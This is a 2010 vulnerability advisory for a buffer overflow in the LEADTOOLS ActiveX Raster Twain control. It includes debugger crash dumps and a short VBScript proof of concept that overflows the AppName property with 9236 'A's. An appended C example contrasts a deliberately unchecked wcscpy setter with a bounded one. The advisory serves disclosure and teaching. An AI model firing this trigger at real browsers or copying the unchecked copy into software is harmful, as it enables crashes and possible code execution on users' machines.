ZSL-2010-4960
LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC
Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2
Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.
Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundary of the user input.
Tested On: Microsoft Windows XP Professional SP3 (EN)
Windows Internet Explorer 8.0.6001.18702
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)
===============================================================
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901 mov word ptr [ecx],ax ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff cmp byte ptr [ebx+7],0FFh ds:0023:00410040=??
==================================================================
Registers:
--------------------------------------------------
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC
--
EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000
ArgDump:
--------------------------------------------------
EBP+8 016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 00000000
EBP+20 0013EF6C -> BAAD0008
EBP+24 100255BC -> 10014840 -> Asc: @H@H
EBP+28 0013EDB8 -> 00000000
--
EBP+8 00150000 -> 000000C8
EBP+12 00410039
EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20 00000000
EBP+24 00410041
EBP+28 7C80FF12 -> 9868146A
CompanyName LEAD Technologies, Inc.
FileDescription LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion 16,5,0,2
InternalName LTRTNU
LegalCopyright © 1991-2009 LEAD Technologies, Inc.
OriginalFileName LTRTNU.DLL
ProductName LEADTOOLS® for Win32
ProductVersion 16.5.0.0
Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
Exception Code: ACCESS_VIOLATION
Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll)
Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll)
Exception Code: BREAKPOINT
Disasm: 7C90120E INT3 (ntdll.dll)
Seh Chain:
--------------------------------------------------
1 7C839AC0 KERNEL32.dll
2 FC2950 VBSCRIPT.dll
3 7C90E900 ntdll.dll
7C912F4E MOV [ECX],AX <--- CRASH
7C96C540 CMP BYTE PTR [EBX+7],FF <--- CRASH
7C90120F RETN <--- CRASH
==================================================================
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
24.08.2010
Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php
PoC:
<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"
prototype = "Property Let AppName As String"
memberName = "AppName"
progid = "LTRASTERTWAINLib_U.LEADRasterTwain_U"
argCount = 1
arg1=String(9236, "A")
target.AppName = arg1
</script>
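The crash above lands in ntdll!wcscpy with a destination pointer that has run off the end of a mapped page while copying the 9236-character AppName string, which is the signature of a fixed-size buffer filled by an unbounded wide-string copy. The following C block is an added example written for this page, not code from the advisory or from LEADTOOLS: it shows that unchecked copy shape beside a bounded setter that rejects oversized input instead of writing past the buffer. The buffer capacity (64 slots), the function names and the helper that builds the A-string are all assumptions made for the illustration.

```c
/* Added example: unbounded wide-string copy vs. a bounded setter.
 * Not the advisory's code; buffer size and names are hypothetical. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <wchar.h>

#define APPNAME_CAP 64u /* hypothetical capacity of the fixed AppName buffer */

/* Vulnerable shape (constructed to mirror the advisory's description; it is
 * never called here): wcscpy trusts the caller and writes until it finds
 * L'\0', so a 9236-character string overruns a 64-slot buffer. */
void set_app_name_unchecked(wchar_t dst[APPNAME_CAP], const wchar_t *src)
{
    wcscpy(dst, src);
}

/* Bounded length: examines at most `cap` characters, so an unterminated or
 * oversized source can never cause a read past `cap`. */
static size_t bounded_wlen(const wchar_t *s, size_t cap)
{
    size_t n = 0;
    while (n < cap && s[n] != L'\0')
        n++;
    return n;
}

/* Hardened setter: copies only if the source plus its terminator fits in
 * `cap` slots; otherwise rejects and leaves `dst` untouched. */
bool set_app_name_checked(wchar_t *dst, size_t cap, const wchar_t *src)
{
    if (dst == NULL || src == NULL || cap == 0)
        return false;
    size_t n = bounded_wlen(src, cap);
    if (n >= cap) /* no room for the terminator: reject */
        return false;
    wmemcpy(dst, src, n);
    dst[n] = L'\0';
    return true;
}

/* Builds a constructed input of `len` L'A' characters, the same shape as the
 * PoC's String(9236, "A"). Caller frees. Returns NULL on allocation failure. */
wchar_t *make_a_string(size_t len)
{
    wchar_t *s = malloc((len + 1) * sizeof *s);
    if (s == NULL)
        return NULL;
    wmemset(s, L'A', len);
    s[len] = L'\0';
    return s;
}

/* Reports whether the checked setter accepts `len` A's into an
 * APPNAME_CAP-slot buffer. Exercised by main and by the tests. */
bool checked_setter_accepts(size_t len)
{
    wchar_t buf[APPNAME_CAP];
    wchar_t *s = make_a_string(len);
    if (s == NULL)
        return false;
    bool ok = set_app_name_checked(buf, APPNAME_CAP, s);
    free(s);
    return ok;
}

int main(void)
{
    printf("63 A's accepted:   %d\n", checked_setter_accepts(63));
    printf("64 A's accepted:   %d\n", checked_setter_accepts(64));
    printf("9236 A's accepted: %d\n", checked_setter_accepts(9236));
    return 0;
}
```

The boundary the bounded setter enforces is `cap - 1` characters: 63 A's fit with the terminator, 64 do not, and the PoC's 9236 are refused before a single character is written. Whether a rejected value should be truncated or reported back to the caller is a design choice; what matters for the class of bug in this advisory is that the length check happens before the copy.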